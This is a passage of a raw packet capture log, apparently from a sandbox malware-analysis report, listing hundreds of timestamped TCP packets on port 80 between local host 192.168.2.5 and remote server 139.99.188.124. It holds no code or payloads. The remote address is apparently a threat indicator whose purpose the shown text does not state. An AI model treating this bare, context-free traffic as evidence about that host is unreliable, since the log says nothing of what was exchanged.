                                                          Jan 2, 2025 10:55:00.594268084 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594309092 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.594317913 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594331026 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594358921 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.594439030 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594450951 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594460964 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594471931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594484091 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594506979 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.594536066 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.594626904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594639063 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594669104 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.595098019 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.595144033 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.595144987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.595156908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.595196962 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.595268011 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.595279932 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.595290899 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.595302105 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.595310926 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.595343113 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.595396042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.646827936 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.799273968 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.799293041 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.799300909 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.799335957 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.799351931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.799361944 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.799371958 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.799381971 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020239115 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020250082 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020258904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020267963 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020277023 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020286083 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020294905 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020308971 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.020339012 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.020569086 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020577908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020586967 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020595074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020603895 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020612955 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020616055 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.020622969 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020631075 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020639896 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020644903 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020644903 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.020649910 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020656109 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020668983 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.020692110 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.020706892 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.020936012 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020946026 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020955086 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.020975113 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.021003962 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.023641109 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.023650885 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.023705006 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.094719887 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094737053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094753027 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094763994 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094774961 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094789982 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.094820976 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.094827890 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094840050 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094849110 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094858885 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094871044 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.094888926 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.094978094 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.094989061 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095019102 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095056057 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095067978 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095098019 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095161915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095170975 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095179081 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095189095 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095199108 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095196962 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095232010 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095256090 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095285892 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095396996 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095407009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095416069 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095426083 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095432043 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095436096 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095446110 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095453024 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095479012 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095608950 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095618963 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095629930 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095645905 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095681906 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095814943 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095825911 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095840931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095860004 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095918894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095930099 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095938921 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095948935 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095957994 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095957994 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.095968008 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095978022 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.095988035 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096009016 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096016884 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096179962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096189976 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096199989 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096227884 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096237898 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096250057 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096259117 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096267939 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096282959 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096314907 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096487999 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096503973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096513987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096524000 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096524954 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096534014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096543074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096550941 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096554041 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096565962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096586943 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096627951 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096791983 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096801996 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096812010 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096818924 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.096832991 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.096854925 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105629921 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105662107 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105673075 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105716944 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105722904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105734110 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105765104 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105777025 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105808973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105822086 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105860949 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105890036 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105901003 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105911016 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105931997 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.105984926 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.105995893 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106007099 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106025934 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106056929 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106131077 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106147051 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106158018 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106168985 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106179953 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106187105 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106190920 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106213093 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106241941 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106408119 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106420040 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106430054 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106440067 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106451988 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.106455088 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.106477976 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.108280897 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216569901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216605902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216615915 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216633081 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216644049 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216651917 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216655016 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216685057 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216727972 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216733932 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216737986 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216747999 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216768980 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216814995 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216859102 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.216891050 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216901064 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216909885 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.216958046 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217025042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217036009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217045069 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217053890 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217063904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217072010 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217086077 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217180014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217206001 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217236996 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217247963 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217256069 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217263937 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217278004 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217288017 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217377901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217389107 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217397928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217406988 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217412949 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217416048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217426062 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217428923 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217462063 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217617035 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217627048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217662096 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217741966 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217752934 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217761993 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217789888 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217798948 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.217820883 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217832088 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217840910 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.217881918 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218063116 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218072891 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218081951 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218091965 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218101025 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218102932 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218110085 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218120098 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218132973 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218142986 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218143940 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.218156099 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.218164921 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425803900 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425940037 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425949097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425959110 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425966978 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425976038 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425980091 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.425983906 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425992966 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.425997972 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426002979 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426012039 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426023960 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426043987 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426223040 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426230907 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426245928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426254034 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426263094 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426270962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426276922 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426301003 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426309109 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426508904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426520109 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426528931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426538944 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426548958 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426552057 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426558971 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426573038 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426588058 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426769018 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426778078 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426786900 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426795959 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426805019 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426812887 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426814079 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426822901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426826000 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426832914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426841021 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.426847935 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.426866055 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427158117 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427166939 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427175045 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427184105 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427192926 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427196980 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427201033 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427211046 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427215099 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427218914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427228928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427236080 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427238941 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427256107 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427263975 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427609921 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427618980 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427627087 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427642107 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427649975 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427650928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427660942 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427668095 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427670956 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427679062 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427687883 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427691936 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427695990 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427700043 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427705050 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427714109 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427721977 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.427727938 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.427742004 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.428108931 CET8049705139.99.188.124192.168.2.5
